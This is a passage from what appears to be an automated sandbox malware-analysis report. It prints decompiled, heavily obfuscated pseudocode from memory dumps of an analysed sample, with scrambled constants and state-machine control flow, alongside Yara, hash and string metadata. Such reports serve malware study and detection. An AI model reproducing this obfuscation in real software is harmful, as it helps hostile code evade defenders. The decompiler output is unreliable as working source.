							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00246DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0023F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x24ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x24ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002376DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00238736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0024422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}













































                                                      0x002426f5
                                                      0x002426f8
                                                      0x00242700
                                                      0x0024270c
                                                      0x0024270e
                                                      0x00242710
                                                      0x00242716
                                                      0x0024271e
                                                      0x00242720
                                                      0x00242728
                                                      0x0024272d
                                                      0x00242735
                                                      0x00242743
                                                      0x00242748
                                                      0x0024274e
                                                      0x00242756
                                                      0x00242763
                                                      0x00242764
                                                      0x00242768
                                                      0x00242770
                                                      0x00242778
                                                      0x00242780
                                                      0x00242788
                                                      0x0024278d
                                                      0x00242795
                                                      0x0024279d
                                                      0x002427a5
                                                      0x002427ad
                                                      0x002427b5
                                                      0x002427c2
                                                      0x002427c6
                                                      0x002427ce
                                                      0x002427db
                                                      0x002427df
                                                      0x002427e7
                                                      0x002427ef
                                                      0x002427f7
                                                      0x002427ff
                                                      0x00242807
                                                      0x0024280f
                                                      0x00242817
                                                      0x00242824
                                                      0x00242828
                                                      0x00242830
                                                      0x00242838
                                                      0x00242846
                                                      0x0024284a
                                                      0x00242852
                                                      0x0024285a
                                                      0x00242862
                                                      0x0024286a
                                                      0x00242872
                                                      0x0024287a
                                                      0x00242882
                                                      0x0024288a
                                                      0x00242897
                                                      0x0024289b
                                                      0x002428a3
                                                      0x002428ab
                                                      0x002428b3
                                                      0x002428bb
                                                      0x002428c0
                                                      0x002428c8
                                                      0x002428d0
                                                      0x002428e0
                                                      0x002428e5
                                                      0x002428ef
                                                      0x002428f2
                                                      0x002428f7
                                                      0x002428fb
                                                      0x00242903
                                                      0x0024290b
                                                      0x00242913
                                                      0x00242918
                                                      0x0024291d
                                                      0x00242925
                                                      0x0024292d
                                                      0x00242935
                                                      0x00242939
                                                      0x00242941
                                                      0x00242949
                                                      0x00242951
                                                      0x00242959
                                                      0x00242961
                                                      0x00242966
                                                      0x0024296e
                                                      0x00242976
                                                      0x0024297e
                                                      0x00242988
                                                      0x0024298c
                                                      0x00242994
                                                      0x00242994
                                                      0x00242999
                                                      0x0024299e
                                                      0x002429ac
                                                      0x00242a76
                                                      0x00242a93
                                                      0x00242a98
                                                      0x00242a9b
                                                      0x00242a9e
                                                      0x00242aa5
                                                      0x00242aaf
                                                      0x00242a3e
                                                      0x00242a3e
                                                      0x00000000
                                                      0x00242a3e
                                                      0x002429b8
                                                      0x00242a48
                                                      0x00242a5a
                                                      0x00242a5f
                                                      0x00242a62
                                                      0x00242a65
                                                      0x00242a6c
                                                      0x00242a71
                                                      0x00242a39
                                                      0x00242a39
                                                      0x00000000
                                                      0x00242a39
                                                      0x002429c4
                                                      0x00000000
                                                      0x00242b0d
                                                      0x002429cc
                                                      0x00242ae7
                                                      0x00242aea
                                                      0x00242aef
                                                      0x00242af2
                                                      0x00000000
                                                      0x00242af2
                                                      0x002429d8
                                                      0x002429dc
                                                      0x00242ad9
                                                      0x00242ad9
                                                      0x00242adf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x002429e2
                                                      0x002429f1
                                                      0x002429f6
                                                      0x002429f9
                                                      0x00242a03
                                                      0x00242a08
                                                      0x00000000
                                                      0x00242a08
                                                      0x002429dc
                                                      0x00242a19
                                                      0x00242a1a
                                                      0x00242a1d
                                                      0x00242a1e
                                                      0x00242a23
                                                      0x00242a27
                                                      0x00242a29
                                                      0x00242a2f
                                                      0x00242a34
                                                      0x00000000
                                                      0x00242a34
                                                      0x00242b15
                                                      0x00000000
                                                      0x00242b15
                                                      0x00242abf
                                                      0x00242ac5
                                                      0x00242acf
                                                      0x00242ad4
                                                      0x00000000
                                                      0x00242ad4

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$4$6x$XLq$e)$}:{$!$*$*
                                                      • API String ID: 0-323616845
                                                      • Opcode ID: cc624bfb40c0737e49e44d0403b40d13e7c017f7ecb356e751992e642ec36a5f
                                                      • Instruction ID: 55e8556b02f7723b16d48fc4e41896b89856b96d89fda111c489c37b9627ec01
                                                      • Opcode Fuzzy Hash: cc624bfb40c0737e49e44d0403b40d13e7c017f7ecb356e751992e642ec36a5f
                                                      • Instruction Fuzzy Hash: DDA16272918341CFD368CF25C88940BFBE1FB84718F508A1DF5899A260D3B5CA19CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002463C1, Relevance: 11.4, Strings: 9, Instructions: 194COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E002463C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x24ca2c; // 0x698300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0023F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00232959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0024507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00235FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00235FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}





































                                                      0x002463c1
                                                      0x002463c4
                                                      0x002463d2
                                                      0x002463d4
                                                      0x002463d9
                                                      0x002463dd
                                                      0x002463e5
                                                      0x002463ed
                                                      0x002463f5
                                                      0x002463fd
                                                      0x00246405
                                                      0x0024640d
                                                      0x00246412
                                                      0x0024641a
                                                      0x00246422
                                                      0x0024642a
                                                      0x00246432
                                                      0x0024643a
                                                      0x00246442
                                                      0x0024644a
                                                      0x00246450
                                                      0x00246455
                                                      0x0024645b
                                                      0x00246463
                                                      0x0024646b
                                                      0x00246473
                                                      0x0024647b
                                                      0x00246483
                                                      0x0024648f
                                                      0x00246494
                                                      0x0024649a
                                                      0x0024649f
                                                      0x002464a7
                                                      0x002464b4
                                                      0x002464b7
                                                      0x002464bb
                                                      0x002464c3
                                                      0x002464cb
                                                      0x002464d3
                                                      0x002464d8
                                                      0x002464dd
                                                      0x002464e5
                                                      0x002464f5
                                                      0x002464f9
                                                      0x00246501
                                                      0x00246509
                                                      0x00246511
                                                      0x0024651d
                                                      0x00246520
                                                      0x00246524
                                                      0x0024652c
                                                      0x00246534
                                                      0x0024653c
                                                      0x00246544
                                                      0x0024654c
                                                      0x00246554
                                                      0x0024655c
                                                      0x00246564
                                                      0x0024656c
                                                      0x00246574
                                                      0x00246578
                                                      0x00246580
                                                      0x0024658d
                                                      0x00246591
                                                      0x00246599
                                                      0x002465a1
                                                      0x002465a9
                                                      0x002465ae
                                                      0x002465b6
                                                      0x002465be
                                                      0x002465c6
                                                      0x002465cb
                                                      0x002465d3
                                                      0x002465d7
                                                      0x002465db
                                                      0x002465df
                                                      0x002465e7
                                                      0x002465ef
                                                      0x002465f7
                                                      0x002465ff
                                                      0x002465ff
                                                      0x00246601
                                                      0x00246602
                                                      0x00246602
                                                      0x00246607
                                                      0x00000000
                                                      0x00246607
                                                      0x00246619
                                                      0x002466f6
                                                      0x002466fc
                                                      0x00246707
                                                      0x00246704
                                                      0x00246704
                                                      0x0024670c
                                                      0x0024670f
                                                      0x00000000
                                                      0x0024661f
                                                      0x00246625
                                                      0x002466d5
                                                      0x002466da
                                                      0x002466dd
                                                      0x002466e6
                                                      0x002466eb
                                                      0x002466f0
                                                      0x00000000
                                                      0x0024662b
                                                      0x00246631
                                                      0x002466a3
                                                      0x002466a8
                                                      0x002466aa
                                                      0x002466af
                                                      0x002466b5
                                                      0x00000000
                                                      0x002466b5
                                                      0x00246633
                                                      0x00246635
                                                      0x00246679
                                                      0x00246680
                                                      0x00246686
                                                      0x00246689
                                                      0x002465ff
                                                      0x002465ff
                                                      0x00246601
                                                      0x00000000
                                                      0x00246601
                                                      0x00246637
                                                      0x0024663d
                                                      0x0024665b
                                                      0x00246661
                                                      0x002465ff
                                                      0x002465ff
                                                      0x00246601
                                                      0x00246602
                                                      0x00000000
                                                      0x00246602
                                                      0x0024663f
                                                      0x00246645
                                                      0x00000000
                                                      0x0024664b
                                                      0x0024664b
                                                      0x00000000
                                                      0x0024664b
                                                      0x00246645
                                                      0x0024663d
                                                      0x00246635
                                                      0x00246631
                                                      0x00246625
                                                      0x00000000
                                                      0x00246619
                                                      0x00246722
                                                      0x0024672a
                                                      0x0024672f
                                                      0x00246734
                                                      0x00246735
                                                      0x00246735
                                                      0x00246741
                                                      0x0024674a
                                                      0x0024674a
                                                      0x00246602

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
                                                      • API String ID: 0-175875280
                                                      • Opcode ID: 1daf34144ef734eb3a5419613333aadc6e80ac1f714baf8e39de4d9814b9b9a1
                                                      • Instruction ID: fc1050d7048dcb6a35f56a5970813d965125546f86201c0439d57fc77c32cbe7
                                                      • Opcode Fuzzy Hash: 1daf34144ef734eb3a5419613333aadc6e80ac1f714baf8e39de4d9814b9b9a1
                                                      • Instruction Fuzzy Hash: 5D8155711183819FD798CF24C49A81BBBF1FBC5358F504A1DF686466A1C7B9CA58CB83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00242349, Relevance: 11.4, Strings: 9, Instructions: 190COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00242349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0023602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x24c030);
				_push(_v36);
				_t168 = E0024878F(_v28, _v32, __eflags);
				E002431E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00246A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00242025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

































                                                      0x00242350
                                                      0x00242354
                                                      0x00242356
                                                      0x0024235a
                                                      0x0024235e
                                                      0x0024235f
                                                      0x00242360
                                                      0x00242365
                                                      0x0024236d
                                                      0x00242370
                                                      0x0024237a
                                                      0x00242382
                                                      0x00242384
                                                      0x0024238c
                                                      0x00242391
                                                      0x00242399
                                                      0x002423a1
                                                      0x002423a6
                                                      0x002423ae
                                                      0x002423b6
                                                      0x002423c4
                                                      0x002423c9
                                                      0x002423cf
                                                      0x002423d7
                                                      0x002423df
                                                      0x002423e3
                                                      0x002423eb
                                                      0x002423f8
                                                      0x002423fb
                                                      0x002423ff
                                                      0x00242407
                                                      0x0024240f
                                                      0x00242417
                                                      0x0024241f
                                                      0x0024242f
                                                      0x00242433
                                                      0x0024243f
                                                      0x00242444
                                                      0x0024244a
                                                      0x00242452
                                                      0x0024245a
                                                      0x00242462
                                                      0x00242467
                                                      0x0024246f
                                                      0x00242477
                                                      0x00242483
                                                      0x00242486
                                                      0x0024248a
                                                      0x00242492
                                                      0x0024249a
                                                      0x002424a2
                                                      0x002424a7
                                                      0x002424af
                                                      0x002424b7
                                                      0x002424bf
                                                      0x002424cc
                                                      0x002424d0
                                                      0x002424d8
                                                      0x002424e0
                                                      0x002424e8
                                                      0x002424f2
                                                      0x002424ff
                                                      0x0024250c
                                                      0x00242514
                                                      0x0024251c
                                                      0x00242524
                                                      0x0024252c
                                                      0x0024253b
                                                      0x0024253c
                                                      0x00242540
                                                      0x00242548
                                                      0x0024254d
                                                      0x00242555
                                                      0x0024255d
                                                      0x00242568
                                                      0x0024256c
                                                      0x00242574
                                                      0x0024257a
                                                      0x002425bb
                                                      0x002425c0
                                                      0x002425c4
                                                      0x002425c6
                                                      0x002425c8
                                                      0x002425ca
                                                      0x002425d0
                                                      0x002425d0
                                                      0x002425d2
                                                      0x002425d8
                                                      0x002425d8
                                                      0x002425da
                                                      0x002425e0
                                                      0x002425e0
                                                      0x002425dc
                                                      0x002425dc
                                                      0x002425de
                                                      0x00000000
                                                      0x00000000
                                                      0x002425de
                                                      0x002425d4
                                                      0x002425d4
                                                      0x002425d6
                                                      0x00000000
                                                      0x00000000
                                                      0x002425d6
                                                      0x002425cc
                                                      0x002425cc
                                                      0x002425ce
                                                      0x00000000
                                                      0x00000000
                                                      0x002425ce
                                                      0x002425e3
                                                      0x002425e4
                                                      0x002425e4
                                                      0x002425e9
                                                      0x00000000
                                                      0x0024257c
                                                      0x00242582
                                                      0x002425b4
                                                      0x00000000
                                                      0x00242584
                                                      0x0024258a
                                                      0x0024265e
                                                      0x0024265e
                                                      0x00242664
                                                      0x00000000
                                                      0x00000000
                                                      0x00242590
                                                      0x002425aa
                                                      0x002425b0
                                                      0x00000000
                                                      0x002425b0
                                                      0x002425aa
                                                      0x0024258a
                                                      0x00242582
                                                      0x00242673
                                                      0x00242673
                                                      0x002425ed
                                                      0x002425f2
                                                      0x002425fe
                                                      0x0024260d
                                                      0x0024261a
                                                      0x00242637
                                                      0x0024264c
                                                      0x0024264e
                                                      0x0024264e
                                                      0x0024264e
                                                      0x00242651
                                                      0x00242656
                                                      0x00242659
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
                                                      • API String ID: 0-892457230
                                                      • Opcode ID: 3c2d2a3d4f6714c1689d69c28e5d17223dbcc16a4b78aa89dc05da0b72ccb0c0
                                                      • Instruction ID: 1c4b9c5b944197ee619386107a8f09b40357ee13263e6e0408a587dbab6d3ad1
                                                      • Opcode Fuzzy Hash: 3c2d2a3d4f6714c1689d69c28e5d17223dbcc16a4b78aa89dc05da0b72ccb0c0
                                                      • Instruction Fuzzy Hash: 83818571519341DFD768CF26C98A51BBBE1BBC1B18F80490DF1859A2A0D7B5CA1ACF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
                                                      • CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
                                                      • PropVariantClear.OLE32(?), ref: 10002E75
                                                      • SysFreeString.OLEAUT32(00000000), ref: 10002E7E
                                                      • SysFreeString.OLEAUT32(00000000), ref: 10002E97
                                                      Strings
                                                      • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: String$Free$AllocClearCreateInstancePropVariant
                                                      • String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
                                                      • API String ID: 2501108336-1018649646
                                                      • Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                                      • Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
                                                      • Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                                      • Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00249B45, Relevance: 10.3, Strings: 8, Instructions: 294COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00249B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0023602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
